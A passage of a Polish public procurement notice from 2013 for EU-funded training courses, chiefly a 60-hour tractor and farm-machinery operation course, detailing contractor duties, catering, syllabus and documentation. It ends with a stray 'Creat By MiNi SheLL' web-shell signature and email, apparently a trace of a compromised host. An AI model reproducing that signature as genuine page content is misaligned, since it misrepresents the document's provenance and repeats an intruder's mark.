Na zakończenie kursu przeprowadzona zostanie ankieta ewaluacyjna. 
6.  Szczegółowy harmonogram realizacji przedmiotu zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - po podpisaniu umowy. 
7.  Wydane certyfikaty oraz zaświadczenia i inne dokumenty dotyczące realizacji kursu muszą zawierać logotypy zgodnie z aktualnymi wytycznymi oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
8. Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia uczestników projektu, na każdym jego etapie wraz z udziałem w ocenach częściowych i ocenie końcowej uczestników kursu oraz kontroli frekwencji kierowanych przez Zamawiającego uczestników kursu na zajęciach. 
9. W pomieszczeniach, w których będzie realizowany kurs będą umieszczone informacje o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
10. Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a)listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu zajęć,
b)potwierdzenia odbioru materiałów szkoleniowych/dydaktycznych,
c)kopie certyfikatów i zaświadczeń potwierdzających uczestnictwo w kursie wraz z potwierdzeniem ich odbioru przez uczestników kursu,
d)protokoły z przebiegu egzaminów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Organizacja i przeprowadzenie Zajęć Eksploatacja agregatu: ciągnik + maszyny rolnicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie Zajęć Eksploatacja agregatu: ciągnik + maszyny rolnicze w wymiarze 60 godzin dydaktycznych (1 godzina = 45 min.) dla każdej z 2 grup (1 grupa = 12 osób) z zapewnieniem materiałów szkoleniowych/dydaktycznych po jednym komplecie dla każdego uczestnika. 
Celem zajęć jest przygotowanie uczestników do samodzielnej, bezpiecznej i prawidłowej eksploatacji agregatu : ciągnik +maszyny rolnicze oraz obsługi technicznej maszyn 
Zamawiający udostępnia sale wykładowe do części teoretycznej zamówienia. 
Z uwagi na brak możliwości zorganizowania zajęć praktycznych z zakresu zamówienia w siedzibie Zamawiającego powinny być one zorganizowane przez Wykonawcę we własnej siedzibie lub w formie wyjazdowej do miejsca umożliwiającego przeprowadzenie zajęć praktycznych z tej części zamówienia.  
W tym przypadku zobowiązany jest do zorganizowania na własny koszt codziennego transportu, dla każdego uczestnika na trasie: Ostrożany - miejsce zajęć praktycznych z zakresu zamówienia - Ostrożany. Wykonawca zobowiązany jest uwzględnić koszt transportu uczniów w cenie za zorganizowanie kursu dla 1 ucznia.
1.Obowiązki Wykonawcy : 
1). Zapewnienie na własny koszt wszystkich elementów związanych z realizacją zamówienia, to jest w szczególności:
a.wykładowców posiadających odpowiednie kwalifikacje do przeprowadzenia kursu, tj. osoby, które posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie umożliwiające realizację kursu stanowiącego przedmiot zamówienia; Kwalifikacje i kompetencje wykładowców powinny być adekwatne do zakresu programowego prowadzonych przez nich bloków tematycznych zajęć.
b.materiałów szkoleniowych/dydaktycznych na własność dla każdego uczestnika kursu (tj. np. kserokopie prezentacji multimedialnych, teczki, płyty CD z materiałami ćwiczeniowymi itp.).,
c.koszt ubezpieczenia uczniów 
d.zapewnienie cateringu dla każdego uczestnika kursu, we wszystkie dni zajęć, w tym: 
Obiad:
gorący posiłek (zupa + drugie danie) na początku kursu - w przypadku realizacji godzin w dni po zajęciach obowiązkowych i w trakcie kursu przeprowadzanego w dni wolne od zajęć lekcyjnych . Zestaw obiadowy musi obejmować: zupę i mięso/rybę min 150g, ziemniaki 150g , surówkę lub sałatkę 100g. lub posiłek jarski (min. 400g/porcja) przy czym liczba posiłków jarskich nie może wystąpić więcej niż raz podczas jednego kursu. Obiady powinny być zróżnicowane. Dany obiad nie powinien powtarzać się częściej niż raz na szkolenie. 
woda mineralna 1,5 l/osobę.
Przerwa herbaciana;
po 1 saszetce herbaty czarnej nie mniej niż 2 gramy na osobę,  
drobne ciastka - nie mniej niż 100 g na osobę,
nie mniej niż 0,3 litra soku pomarańczowego lub jabłkowego na osobę.
Ponadto poza wymienionym wyżej asortymentem wykonawca dostarczy: 
termos z gorącą wodą,
cukier,
cytryny do herbaty,
Sposób podania: w formie szwedzkiego stołu z zapewnieniem serwetek, mieszadełek oraz filiżanek, talerzyków w ilości wystarczającej dla obsłużenia każdego uczestnika. Wykonawca zabiera naczynia i resztki poczęstunku najpóźniej 30 min. po zakończeniu kursu. Wykonawca odpowiada za podanie poczęstunku zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia.
e. prowadzenie  zajęć zgodnie z przepisami oraz zasadami bezpieczeństwa i higieny pracy, sprawowanie opieki nad uczestnikami podczas zajęć oraz przerw
f. prowadzenia dziennika zajęć i listy obecności na zajęciach oraz dostarczenie ich do Zamawiającego po zakończeniu kursu dla każdej z grup;
g. bieżącego informowania Zamawiającego o ewentualnych trudnościach na etapie realizacji szkolenia, zakończeniu szkolenia oraz jego wynikach;
h. poddawanie się kontroli prawidłowości realizacji projektu dokonywanej przez Zamawiającego oraz inne uprawnione do tego instytucje, w tym wglądu do wszelkiej dokumentacji związanej z projektem;
i. wydanie certyfikatów potwierdzających uzyskanie kwalifikacji i zaświadczeń o ukończeniu zajęć.  
2). Opracowanie autorskiego programu Zajęć Eksploatacja agregatu: ciągnik + maszyny rolnicze (z podaniem wymiaru godzin przeznaczonych na poszczególne zagadnienia) obejmującego co najmniej poniższe zagadnienia: 
2.1. Wymagania bezpieczeństwa 
a.Wymagania ogólne
b.Zasady bezpiecznej obsługi ciągnika 
c.Zasady bezpiecznej pracy ciągnikiem
d.Kierowanie ciągnikiem
e.Zasady bezpieczeństwa przy wykonywaniu prac transportowych 
f.Praca ciągnika z włączonym wałem odbioru mocy (WOM) 
g.Zasady bezpieczeństwa pożarowego
2.2. dane identyfikacyjne ciągnika 
2.3. Zapoznanie z ciągnikiem i urządzeniami kontrolno - sterującymi 
a.Organy sterowania i kontroli w ciągnikach 
b.Siedzisko kierowcy 
c.Układ wentylacji i ogrzewania kabiny
d.Układ klimatyzatora (wyposażenie dodatkowe) 
e.Układ kierowniczy
f.Włączanie rozrusznika i urządzeń kontrolnych
g.Hamulce
i.Uruchomienie ciągnika 
f.Ruszanie z miejsca
g.Zatrzymanie silnika i ciągnika
h.Blokowanie mechanizmu różnicowego
i.Sterowanie napędem przedniego mostu 
j.Tylny wał odbioru mocy (WOM) 
k.Urządzenia przyłączeniowo-zaczepowe 
l.Tylny trzypunktowy układ zawieszenia (TUZ) 
m.Górny zaczep transportowy
n.Zaczep rolniczy
o.Sterowanie podnośnikiem w czasie pracy 
p.Układ hydrauliki zewnętrznej 
q.Zmiana rozstawu kół przedniego mostu napędowego
r.Zmiana rozstawu kół tylnych ciągnika 
s.Zasady doboru wymiarów kół 
t.Zwiększanie własności trakcyjnych ciągników PRONAR
u.Instalacja elektryczna 
v.Docieranie ciągnika 
2.4.Obsługa techniczna ciągnika 
a.Tabela czynności przeglądów technicznych
b.Obsługa techniczna ciągnika (P-1) po docieraniu (30 mth) 
c.Przegląd techniczny (PC) po 10 mth pracy lub codziennie
d.Przegląd techniczny (P-2) po 125 mth pracy
e.Przegląd techniczny (P-3) po 250 mth pracy
f.Przegląd techniczny (P-4) po 500 mth pracy
g.Przegląd techniczny (P-5) po 1000 mth pracy
h.Przegląd techniczny (P-6) po 2000 mth pracy
i.Pozostałe czynności obsługi technicznej
j.Zalecane paliwa, oleje, smary i płyny eksploatacyjne do stosowania w ciągnikach
k.Przygotowywanie ciągnika do dłuższego przechowywania 
l.Przygotowywanie ciągnika do pracy po długim okresie przechowywania
2.5. Akty prawne dot. eksploatacji ciągnika, ciągnika + maszyny rolnicze 
2.6. Obsługa agregatów do upraw polowych 
a.Maszyny uprawowe KÖCKERLING
ALLROUNDER
QUADRO i VECTOR
ULTIMA
b.Brony talerzowe KUHN
Brony talerzowe typu X
Brony talerzowe typu V
c.Kultywatory ścierniskowe
Kultywatory ścierniskowe zębowe
d.Głębosze
e.Glebogryzarki
f.Brony obrotowe
g.Rozsiewacze nawozu
h.Sieczkarnie do kukurydzy ZACZEPIANE NA TUZ CIĄGNIKA
2.7. MASZYNY ZACZEPIANE NA PRZEDNI TUZ CIĄGNIKA.
a.Pługi śnieżne
b.Kosiarki bębnowe czołowe
c.Zamiatarki ciągnikowe
d.Podnośniki uniwersalne
e.Rębak do gałęzi
2. Rekrutację na zajęcia przeprowadzi Zamawiający. 
3. Szczegółowy harmonogram realizacji przedmiotu zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - po podpisaniu umowy. 
4. Wydane certyfikaty , zaświadczenia i inne dokumenty dotyczące realizacji kursu muszą zawierać logotypy zgodnie z aktualnymi wytycznymi oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
5. Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem przeprowadzanych zajęć, na każdym etapie wraz z udziałem w ocenach częściowych i ocenie końcowej uczestników zajęć oraz kontroli frekwencji kierowanych przez Zamawiającego uczestników projektu na zajęciach. 
6. W pomieszczeniach, w których będą realizowane zajęcia będą umieszczone informacje o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
7. Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a)listę obecności z własnoręcznymi podpisami uczestników zajęć w każdym dniu zajęć,
b)dzienniki zajęć uzupełnione w program zajęć 
c)potwierdzenia odbioru materiałów szkoleniowych/dydaktycznych,
d)kopie certyfikatów i zaświadczeń potwierdzających uczestnictwo w kursie wraz z potwierdzeniem ich odbioru przez uczestników kursu,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com